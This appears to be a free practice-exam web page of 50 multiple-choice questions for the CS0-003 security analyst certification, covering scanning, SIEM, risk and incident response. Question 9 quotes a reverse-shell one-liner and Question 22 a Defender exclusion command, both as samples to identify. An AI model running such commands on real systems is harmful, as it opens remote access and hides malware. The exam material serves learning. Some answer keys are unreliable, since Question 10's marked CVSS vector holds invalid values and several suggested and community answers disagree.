CS0-003 Practice Exam Free

CS0-003 Practice Exam Free – 50 Questions to Simulate the Real Exam

Are you getting ready for the CS0-003 certification? Take your preparation to the next level with our CS0-003 Practice Exam Free – a carefully designed set of 50 realistic exam-style questions to help you evaluate your knowledge and boost your confidence.

Using a CS0-003 practice exam free is one of the best ways to:

  • Experience the format and difficulty of the real exam
  • Identify your strengths and focus on weak areas
  • Improve your test-taking speed and accuracy

Below, you will find 50 realistic CS0-003 practice exam free questions covering key exam topics. Each question reflects the structure and challenge of the actual exam.

Question 1

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

A. DKIM

B. SPF

C. SMTP

D. DMARC

 


Suggested Answer: B

Community Answer: B

 

Question 2

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

A. Deploy agents on all systems to perform the scans

B. Deploy a central scanner and perform non-credentialed scans

C. Deploy a cloud-based scanner and perform a network scan

D. Deploy a scanner sensor on every segment and perform credentialed scans

 


Suggested Answer: D

Community Answer: A

 

Question 3

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

A. function w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info"; }

B. function x() { info=$(geoiplookup $1) && echo "$1 | $info"; }

C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info"; }

D. function z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info"; }

 


Suggested Answer: B

Community Answer: B

 

Question 4

An analyst investigated a website and produced the following:
 Image
Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?

A. nmap -sS -T4 -F insecure.org

B. nmap -C insecure.org

C. nmap -sV -T4 -F insecure.org

D. nmap -A insecure.org

 


Suggested Answer: C

Community Answer: C

 

Question 5

A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

A. Deploy a WAF to the front of the application.

B. Replace the current MD5 with SHA-256.

C. Deploy an antivirus application on the hosting system.

D. Replace the MD5 with digital signatures.

 


Suggested Answer: B

Community Answer: B

 

Question 6

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

A. Impact

B. Vulnerability score

C. Mean time to detect

D. Isolation

 


Suggested Answer: A

Community Answer: A

 

Question 7

Which of the following best describes the goal of a tabletop exercise?

A. To test possible incident scenarios and how to react properly

B. To perform attack exercises to check response effectiveness

C. To understand existing threat actors and how to replicate their techniques

D. To check the effectiveness of the business continuity plan

 


Suggested Answer: A

Community Answer: A

 

Question 8

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls and two-factor authentication. Which of the following does this most likely describe?

A. System hardening

B. Hybrid network architecture

C. Continuous authorization

D. Secure access service edge

 


Suggested Answer: A

Community Answer: A

 

Question 9

A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?

A. RCE

B. Reverse shell

C. XSS

D. SQL injection

 


Suggested Answer: B

Community Answer: B

 

Question 10

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

A. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L

B. CVSS:3.1/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L

C. CVSS:3.1/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H

D. CVSS:3.1/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

 


Suggested Answer: A

Community Answer: A

 

Question 11

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A. Scope

B. Weaponization

C. CVSS

D. Asset value

 


Suggested Answer: B

Community Answer: B

 

Question 12

An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation?

A. OpenVAS

B. Angry IP Scanner

C. Wireshark

D. Maltego

 


Suggested Answer: C

Community Answer: C

 

Question 13

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

A. Running regular penetration tests to identify and address new vulnerabilities.

B. Conducting regular security awareness training of employees to prevent social engineering attacks.

C. Deploying an additional layer of access controls to verify authorized individuals.

D. Implementing intrusion detection software to alert security teams of unauthorized access attempts

 


Suggested Answer: C

Community Answer: C

 

Question 14

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?

A. High GPU utilization

B. Bandwidth consumption

C. Unauthorized changes

D. Unusual traffic spikes

 


Suggested Answer: A

Community Answer: A

 

Question 15

A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface:
 Image
Which of the following exploits is most likely being attempted?

A. SQL injection

B. Local file inclusion

C. Cross-site scripting

D. Directory traversal

 


Suggested Answer: A

 

Question 16

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A. External

B. Agent-based

C. Non-credentialed

D. Credentialed

 


Suggested Answer: B

Community Answer: B

 

Question 17

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

A. SLA

B. MOU

C. Best-effort patching

D. Organizational governance

 


Suggested Answer: A

Community Answer: A

 

Question 18

An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?

A. False positive

B. True negative

C. False negative

D. True positive

 


Suggested Answer: C

Community Answer: B

 

Question 19

A security analyst reviews the following extract of a vulnerability scan that was performed against the web server:
 Image
Which of the following recommendations should the security analyst provide to harden the web server?

A. Remove the version information on http-server-header.

B. Disable tcp_wrappers.

C. Delete the /wp-login.php folder.

D. Close port 22.

 


Suggested Answer: A

 

Question 20

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement

B. Configure MFA with strict access

C. Deploy an API gateway

D. Enable SSO to the cloud applications

 


Suggested Answer: A

Community Answer: A

 

Question 21

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

A. MITRE ATT&CK

B. Cyber Kill Chain

C. OWASP

D. STIX/TAXII

 


Suggested Answer: A

Community Answer: A

 

Question 22

An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high volume of random DNS queries begin to originate from the system. An investigation on the system reveals the following:
Add-MpPreference -ExclusionPath '%Program Files%ksyconfig'
Which of the following is possibly occurring?

A. Persistence

B. Privilege escalation

C. Credential harvesting

D. Defense evasion

 


Suggested Answer: D

Community Answer: D

 

Question 23

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R
Which of the following represents the exploit code maturity of this critical vulnerability?

A. E:U

B. S:C

C. RC:R

D. AV:N

E. AC:L

 


Suggested Answer: A

Community Answer: A

 

Question 24

A cybersecurity analyst is recording the following details:
•	ID
•	Name
•	Description
•	Classification of information
•	Responsible party
In which of the following documents is the analyst recording this information?

A. Risk register

B. Change control documentation

C. Incident response playbook

D. Incident response plan

 


Suggested Answer: A

Community Answer: A

 

Question 25

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:
•	Must use minimal network bandwidth
•	Must use minimal host resources
•	Must provide accurate, near real-time updates
•	Must not have any stored credentials in configuration on the scanner
Which of the following vulnerability scanning methods should be used to best meet these requirements?

A. Internal

B. Agent

C. Active

D. Uncredentialed

 


Suggested Answer: B

Community Answer: B

 

Question 26

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?

A. CIS Benchmarks

B. PCI DSS

C. OWASP Top Ten

D. ISO 27001

 


Suggested Answer: A

Community Answer: A

 

Question 27

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

A. Agree on the goals and objectives of the plan

B. Determine the site to be used during a disaster

C. Demonstrate adherence to a standard disaster recovery process

D. Identify applications to be run during a disaster

 


Suggested Answer: A

Community Answer: A

 

Question 28

An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following is this an example of?

A. Passive network footprinting

B. OS fingerprinting

C. Service port identification

D. Application versioning

 


Suggested Answer: A

Community Answer: A

 

Question 29

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

A. Enrich the SIEM-ingested data to include all data required for triage

B. Schedule a task to disable alerting when vulnerability scans are executing

C. Filter all alarms in the SIEM with low severity

D. Add a SOAR rule to drop irrelevant and duplicated notifications

 


Suggested Answer: D

Community Answer: D

 

Question 30

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:
 Image
Which of the following should be completed first to remediate the findings?

A. Ask the web development team to update the page contents

B. Add the IP address allow listing for control panel access

C. Purchase an appropriate certificate from a trusted root CA

D. Perform proper sanitization on all fields

 


Suggested Answer: C

Community Answer: D

 

Question 31

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

A. Credentialed scan

B. External scan

C. Differential scan

D. Network scan

 


Suggested Answer: A

Community Answer: A

 

Question 32

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?

A. Increasing training and awareness for all staff

B. Ensuring that malicious websites cannot be visited

C. Blocking all scripts downloaded from the internet

D. Disabling all staff members’ ability to run downloaded applications

 


Suggested Answer: A

Community Answer: A

 

Question 33

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Choose two.)

A. Hostname

B. Missing KPI

C. CVE details

D. POC availability

E. IoCs

F. npm identifier

 


Suggested Answer: CD

Community Answer: CE

 

Question 34

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

A. Risk register

B. Vulnerability assessment

C. Penetration test

D. Compliance report

 


Suggested Answer: A

Community Answer: A

 

Question 35

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

A. Review of security requirements

B. Compliance checks

C. Decomposing the application

D. Security by design

 


Suggested Answer: C

Community Answer: C

 

Question 36

An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does this describe?

A. Delivery

B. Command and control

C. Reconnaissance

D. Weaponization

 


Suggested Answer: B

Community Answer: B

 

Question 37

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

A. To provide metrics and test continuity controls

B. To verify the roles of the incident response team

C. To provide recommendations for handling vulnerabilities

D. To perform tests against implemented security controls

 


Suggested Answer: A

Community Answer: A

 

Question 38

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

A. The NTP server is not configured on the host

B. The cybersecurity analyst is looking at the wrong information

C. The firewall is using UTC time

D. The host with the logs is offline

 


Suggested Answer: A

Community Answer: A

 

Question 39

A vulnerability scanner generates the following output:
 Image
The company has an SLA for patching that requires time frames to be met for high-risk vulnerabilities. Which of the following should the analyst prioritize first for remediation?

A. Oracle JDK

B. Cisco Webex

C. Redis Server

D. SSL Self-signed Certificate

 


Suggested Answer: C

Community Answer: A

 

Question 40

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

A. Nmap

B. TCPDump

C. SIEM

D. EDR

 


Suggested Answer: B

Community Answer: B

 

Question 41

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?

A. RFI

B. LFI

C. CSRF

D. XSS

 


Suggested Answer: C

Community Answer: C

 

Question 42

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

A. Beaconing

B. Cross-site scripting

C. Buffer overflow

D. PHP traversal

 


Suggested Answer: A

Community Answer: A

 

Question 43

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:
 Image
Which of the following vulnerability types is the security analyst validating?

A. Directory traversal

B. XSS

C. XXE

D. SSRF

 


Suggested Answer: C

Community Answer: C

 

Question 44

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

A. Avoid

B. Transfer

C. Accept

D. Mitigate

 


Suggested Answer: A

Community Answer: A

 

Question 45

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

A. Data enrichment

B. Security control plane

C. Threat feed combination

D. Single pane of glass

 


Suggested Answer: D

Community Answer: D

 

Question 46

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

A. Firewall logs

B. Indicators of compromise

C. Risk assessment

D. Access control lists

 


Suggested Answer: B

Community Answer: C

 

Question 47

A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?

A. Help desk

B. Law enforcement

C. Legal department

D. Board member

 


Suggested Answer: C

Community Answer: C

 

Question 48

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

A. Take a snapshot of the compromised server and verify its integrity

B. Restore the affected server to remove any malware

C. Contact the appropriate government agency to investigate

D. Research the malware strain to perform attribution

 


Suggested Answer: A

Community Answer: A

 

Question 49

Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage?

A. Timeline

B. Evidence

C. Impact

D. Scope

 


Suggested Answer: C

Community Answer: C

 

Question 50

After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?

A. Irregular peer-to-peer communication

B. Rogue device on the network

C. Abnormal OS process behavior

D. Data exfiltration

 


Suggested Answer: D

Community Answer: D

 

Free Access Full CS0-003 Practice Exam Free

Looking for additional practice? Click here to access a full set of CS0-003 practice exam free questions and continue building your skills across all exam domains.

Our question sets are updated regularly to ensure they stay aligned with the latest exam objectives—so be sure to visit often!

Good luck with your CS0-003 certification journey!


PracticeTestFree.com materials do not contain actual questions and answers from Cisco's Certification Exams. PracticeTestFree.com doesn't offer Real Microsoft Exam Questions. PracticeTestFree.com doesn't offer Real Amazon Exam Questions.
